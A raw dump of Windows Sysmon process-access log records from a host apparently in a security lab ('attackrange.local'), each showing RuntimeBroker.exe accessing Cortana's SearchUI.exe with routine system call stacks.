13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166096C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011827Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166096C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011826Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011825Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011824Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011823Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166116C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166116C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166104C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166104C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166008C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165948C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166052C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166096C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166104C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 